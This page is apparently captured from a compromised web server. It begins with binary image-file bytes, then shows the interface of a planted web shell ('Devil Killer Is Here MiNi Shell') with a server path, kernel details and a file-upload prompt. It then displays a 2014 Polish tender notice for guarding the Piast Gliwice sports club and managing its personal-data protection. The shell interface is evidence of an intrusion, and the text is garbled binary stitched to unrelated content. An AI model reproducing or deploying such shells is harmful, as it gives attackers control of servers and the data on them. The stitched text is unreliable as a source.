JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/7601-N-2014.html

<p class="kh_header"><b>Gliwice: Świadczenie usługi stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20 oraz zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20</b><br>
<b>Numer ogłoszenia: 7601 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gliwicki Klub Sportowy "Piast" Spółka Akcyjna , ul. Okrzei 20, 44-100 Gliwice, woj. śląskie, tel. 32 335 31 15-16, faks 32 335 31 18.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20 oraz zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20 oraz zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20, obejmującej:
A. Świadczenie stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20
1.	Wykonawca będzie prowadził dozór obiektów Zamawiającego poprzez obserwacje obiektów przez zainstalowany system monitoringu, obchody terenu oraz interwencje w razie zagrożenia.
2.	Usługa będzie świadczona zarówno w dni robocze, w soboty, niedziele i święta przez 24 godziny - przez dwóch pracowników z których co najmniej 1 będzie  na dzień 1 lutego 2014 r.  wpisany na listę kwalifikowanych pracowników ochrony fizycznej.
3.	Ochrona obiektu zamawiającego polega na ochronie przed zniszczeniem lub uszkodzeniem nieruchomości znajdujących się na ochranianym terenie oraz na  ochronie przed kradzieżą, utratą, uszkodzeniem lub dewastacją majątku znajdującego się na terenie obiektu, w skład którego wchodzą: trzy- kondygnacyjny budynek, stadion główny, boisko treningowe oraz parkingi mieszczące się wewnątrz ogrodzenia.
4.	Rodzaj mienia, obiekty, wyposażenie podlegające ochronie oraz ich stan techniczny i zabezpieczenia oraz uwagi stron zostaną określone w protokole przekazania przejęcia obiektu. Z chwilą protokolarnego przejęcia obiektów do ochrony Wykonawca przejmuje na siebie odpowiedzialność za mienie Zamawiającego oddane pod ochronę.
5.	Przed przystąpieniem do realizacji zamówienia należy przedstawić stały 10-cio osobowy, odpowiednio wyselekcjonowany skład osobowy pełniący służbę według grafiku. Zmiana pojedynczych osób może nastąpić jedynie w przypadkach losowych (np. nagła choroba) lub w przypadku nie uzyskania wpisu na listę kwalifikowanych pracowników ochrony fizycznej.
6.	Niedopuszczalna jest zmiana składu osobowego bez uzasadnienia i wskazania przyczyny. Wszelkie zmiany składu osobowego muszą być przedstawione pisemnie drogą elektroniczną z wyprzedzeniem 48 godzin.
7.	Zapewnienie gotowości do podjęcia działań przez  grupę interwencyjną przybywającą na teren ochranianego obiektu w razie konieczności podjęcie bezpośrednich i natychmiastowych działań w celu udaremnienia szkody, w tym kradzieży oraz ujęcia sprawców - składającą się z dwóch pracowników ochrony z których co najmniej 1 jest/będzie wpisany na listę kwalifikowanych pracowników ochrony fizycznej - będącą w dyspozycji Wykonawcy. Grupa interwencyjna powinna przybyć na teren ochranianego obiektu w czasie 10 minut od zgłoszenia w porze nocnej oraz 15 minut od zgłoszenia w porze dziennej. Zamawiający zastrzega sobie możliwość próbnego wezwania grupy interwencyjnej maksymalnie dwa razy podczas trwania jednego okresu rozliczeniowego.

B. Zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.
Przy świadczeniu ww. usługi należy stosować niżej wymienione przepisy:
1.	Ustawa o ochronie danych osobowych z dnia 29 sierpnia 1997 r. z późniejszymi zmianami określająca ogólne zasady ochrony danych, ale również zasady szkolenia, wydawania zaświadczeń, prowadzenia rejestrów, itp.
2.	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz.U. z 2004 r. nr 100, poz. 1024) określające:

a) sposób prowadzenia i zakres dokumentacji opisującej sposób przetwarzania danych osobowych oraz środki techniczne i organizacyjne zapewniające ochronę przetwarzanych danych osobowych odpowiednią do zagrożeń oraz kategorii danych objętych ochroną;
b) podstawowe warunki techniczne i organizacyjne, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych;
c)wymagania w zakresie odnotowywania udostępniania danych osobowych i bezpieczeństwa przetwarzania danych osobowych; 
 d) wymagania co powinna zawierać POLITYKA BEZPIECZEŃSTWA (paragraf 4) oraz INSTRUKCJA zarządzania systemem informatycznym służącym do przetwarzania danych osobowych (paragraf 5);
3.   Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 11 grudnia 2008 r. w sprawie wzoru zgłoszenia zbioru  do rejestracji Generalnemu Inspektorowi Ochrony Danych Osobowych (Dz.U. z 2008 r. nr 229, poz. 1536) -  określające tryb i zasady zgłaszania zbioru do rejestracji.

Zakres zamówienia:
1.	Ochrona danych osobowych uczestników imprez masowych.
2.	Ochroną danych osobowych osób, które zadeklarowały przekazanie do Administratora Danych (Piast Gliwice) swoich danych osobowych w celu ich wykorzystania marketingowego.
3.	Ochrona danych osobowych zawartych w zapisie monitoringu imprez masowych.
4.	Ochrona danych osobowych osób wchodzących na teren obiektu.

Ochrona danych winna być realizowana  poprzez:
1.	   utworzenie Polityki Bezpieczeństwa danych Osobowych (i bieżące jej aktualizowanie wg potrzeb),
2.	   utworzenie Instrukcji Zarządzania Systemami Teleinformatycznymi w których są przetwarzane dane osobowe (i ich bieżącego aktualizowania),
3.	   przeprowadzenie obowiązkowych szkoleń,
4.	   wydanie zaświadczeń,
5.	   prowadzenie rejestru wydanych zaświadczeń.

Pozostałe warunki przedstawiono we wzorze umowy nr PN/UZP/02/2014.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.40.00-2, 79.90.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany do wniesienia wadium w wysokości:           3 000,00 zł (słownie: trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Świadczenie stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20
Wykonawca musi wykazać, że posiada koncesję na wykonywanie działalności gospodarczej       w zakresie usług ochrony osób i mienia, realizowanej w formie bezpośredniej ochrony fizycznej, ważną przez cały okres trwania umowy.
B. Zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.
Uprawnienia dotyczące uprawnień przysługujących Generalnemu Inspektorowi Ochrony Danych Osobowych - Zamawiający nie wymaga spełnienia tego warunku.
W przypadku podmiotów działających wspólnie powyższy warunek musi spełniać każdy podmiot.
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Świadczenie stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20
Wykonawca w okresie 3 lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał a przypadku świadczeń okresowych lub ciągłych również wykonuje usługi o tożsamym charakterze; tzn. związane ze stałą ochroną mienia o wartości łącznej co najmniej  200 000 zł wraz z załączeniem  dowodu czy zamówienie zostało wykonane należycie, a w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie.
B. Zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.
Wykonawca w okresie 3 lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał a przypadku świadczeń okresowych lub ciągłych również wykonuje usługi o tożsamym charakterze; tzn. związane z wprowadzeniem zasad zgodnego z przepisami prawa przetwarzania danych osobowych                 i nadzorem nad ochroną tych danych w co najmniej:
- 3 podmioty, przy 6 zarejestrowanych zbiorów dla tych podmiotów wraz z załączeniem  dowodu czy zamówienie zostało wykonane należycie, a w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie;
przy czym ww. zamówienia  muszą być wykonane z zastosowaniem postanowień niżej ww. ustaw i rozporządzeń:
1.	Ustawa o ochronie danych osobowych z dnia 29 sierpnia 1997 r. z późniejszymi zmianami określająca ogólne zasady ochrony danych, ale również zasady szkolenia, wydawania zaświadczeń, prowadzenia rejestrów, itp.
2.	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz.U. z 2004 r. nr 100, poz. 1024) określające:

a) sposób prowadzenia i zakres dokumentacji opisującej sposób przetwarzania danych osobowych oraz środki techniczne i organizacyjne zapewniające ochronę przetwarzanych danych osobowych odpowiednią do zagrożeń oraz kategorii danych objętych ochroną;
b) podstawowe warunki techniczne i organizacyjne, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych;
c)wymagania w zakresie odnotowywania udostępniania danych osobowych i bezpieczeństwa przetwarzania danych osobowych; 
d) wymagania co powinna zawierać POLITYKA BEZPIECZEŃSTWA (paragraf 4) oraz INSTRUKCJA zarządzania systemem informatycznym służącym do przetwarzania danych osobowych (paragraf 5);
3.   Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 11 grudnia 2008 r. w sprawie wzoru zgłoszenia zbioru  do rejestracji Generalnemu Inspektorowi Ochrony Danych Osobowych (Dz.U. z 2008 r. nr 229, poz. 1536) -  określające tryb i zasady zgłaszania zbioru do rejestracji.

W przypadku podmiotów działających wspólnie powyższy warunek musi spełniać 1 podmiot lub  wszystkie podmioty łącznie. 
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Świadczenie stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20

Wykonawca musi wykazać, że posiada zezwolenie radiowe na używanie urządzeń nadawczych lub nadawczo-odbiorczych, pracujących w sieci radiokomunikacji ruchomej lądowej, typu dyspozytorskiego, wydane przez urząd Regulacji Telekomunikacji i Poczty oraz posiadać co najmniej 2 profesjonalne radiotelefony o parametrach technicznych odpowiadających ww. zezwoleniu i mocy powyżej 1 W.
B. Zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.
Zamawiający nie określa  warunku dla tej części zamówienia.

W przypadku podmiotów działających wspólnie powyższy warunek musi spełniać 1 podmiot lub  wszystkie podmioty łącznie.
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Świadczenie stałej ochrony mienia obiektów  Gliwickiego Klubu Sportowego PIAST S.A. w Gliwicach ul. Okrzei 20
Wykonawca musi dysponować:
a)	    co najmniej 10 osobami, w tym co najmniej 4 wpisanych na listę kwalifikowanych pracowników ochrony fizycznej
b)	    grupą interwencyjną z czasem reakcji do 10 minut od zgłoszenia w porze nocnej oraz 15 minut od zgłoszenia w porze dziennej (czas reakcji jest to czas dotarcia grupy  do  obiektu) składającą się z dwóch pracowników ochrony. w tym co najmniej 1 jest/będzie wpisany na  listę kwalifikowanych pracowników ochrony fizycznej

B. Zarządzanie bezpieczeństwem i ochroną danych osobowych gromadzonych przez Gliwicki Klub Sport PIAST S.A. w Gliwicach ul. Okrzei 20.
Osoba prowadząca szkolenie powinna legitymować się doświadczeniem w zakresie wykonywania czynności Administratora Bezpieczeństwa Informacji i dyplomem ukończenia studiów kierunkowych/podyplomowych lub certyfikowanym zaświadczeniem ukończenia specjalistycznego szkolenia dla administratora danych osobowych oraz wykazać się co najmniej     2 - letnim doświadczeniem.
W przypadku podmiotów działających wspólnie powyższy warunek spełnia 1 podmiot lub wszystkie podmioty łącznie. 
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od prowadzonej działalności gospodarczej związanej z przed-miotem zamówienia,  na dzień otwarcia ofert, na wartość nie mniejszą niż 3 000 000,00 zł, tj. posiada opłaconą polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony jw. (w każdym zadaniu)
W przypadku podmiotów działających wspólnie powyższy warunek musi spełnić 1 podmiot lub wszystkie podmiotu łącznie.
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
